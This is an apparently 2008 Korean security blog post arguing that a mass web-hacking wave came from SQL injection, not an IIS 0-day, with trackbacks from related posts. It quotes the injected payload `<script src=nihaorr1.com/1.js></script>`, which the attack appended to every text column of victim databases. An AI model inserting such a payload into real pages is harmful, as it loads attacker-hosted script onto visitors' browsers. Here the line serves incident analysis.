애드센스4



최근의 대량 웹 해킹에 대한 짧은 생각 보안 정보

최근의 대량 웹 해킹이 IIS 의 0-day 취약점이 아니겠냐는 루머가 외국에 돌고 있다.
내가 보유하고 있는 패턴, 정보의 범위 내에선 이런 주장은 Non-sense 다.

참고로 국내 보안 전문가 커뮤니티에서 해당 공격에 대해 분석한 코멘트를 보자.

"쿼리가 하는 일이 ㄷㄷㄷ 이네요.
모든 사용자가 생성한 테이블을 찾아서 컬럼이 문자형(nvarchar text ntext varchar)인 경우 <script src=nihaorr1.com/1.js></script> 를 추가시킵니다.
이렇게 되면 문자형 데이터에 위 스크립트가 추가 됩니다.
예를들어 게시판의 경우 모든 리스트에 <script src=nihaorr1.com/1.js></script> 가 삽입이 되겠네요.." - by 방립동

분명 "쿼리가 하는 일이" 라고 언급하고 있으며, 해당 쿼리가 하는 일을 명확히 분석하고 있다.
마이크로소프트 사 역시 SQL injection 취약점 문제임을 분명히 언급하고 있다.

이미 공격에 사용되는 툴공격에 사용된 쿼리까지 분석된 마당에 IIS 0-day 루머가 계속 나오는 이유가 몰까?


이글루스 가든 - professional secur...

트랙백

이 글과 관련된 글 쓰기 (트랙백 보내기)
TrackbackURL : http://swbae.egloos.com/tb/1748837 [도움말]
  • UN-英정부도 한때 뚫렸다…개발코드 허점 때문 2008/04/30 10:22 #

    이번 사고가 발생한 악성 코드 루틴을 구글에서 검색하면, UN 웹사이트의 일부는 여전히 악성 코드에 감염된 상태다. / 서명덕 기자UN 일부 웹사이트는 여전히 감염…구글서 확인 가능MS 관계자 “개발자들이 SQL 인젝션 공격방어 소홀”국내도 유사 피해 우려…‘악성 자바스크립트’ 주의를옥션, 국민은행, 청와대 등 국내 주요 기관이나 민간 기업들의 잇단 해킹...... more

  • 보안 업체를 포함한 대량 웹페이지 감염 사고 발생 2008/05/02 09:27 #

    최근 2 만개 이상의 웹페이지들이 대량 변조되어 일반 대중을 상대로 한 공격에 이용된 것이 밝혀졌습니다. 이러한 것들은 일종의 악성 코드 설치 스크립트로서 윈도우즈, 리얼 플레이어 등의 취약점을 이용하는 익스플롯잇이 내장 되어 있습니다. 이러한 공격은 맥아피 어버트랩(Avert Lab)연구원들이 최근 3월 12일에 최초로 탐지했다고 합니다. 이는 최근 대량 웹해킹 중에서 가장 큰..... more

핑백

  • 헐랭이와 IT보안 : 묘한 표절성 기사 2008-05-01 23:29:23 #

    ... 로 뒤져보면 몇 건이 나오더라' 하는 부분) 등을 보면 제 블로그에 올라온 http://swbae.egloos.com/1747128 글을 중심으로, http://swbae.egloos.com/1748837 글의 내용을 짜깁기해 작성한 것이 아닐까 하는 심증이 강하게 드는데... 한편으론, 완전히 베낀 문장 자체는 없기에 표절이라고 하기는 어려운 ... more

덧글

댓글 입력 영역


애드센스7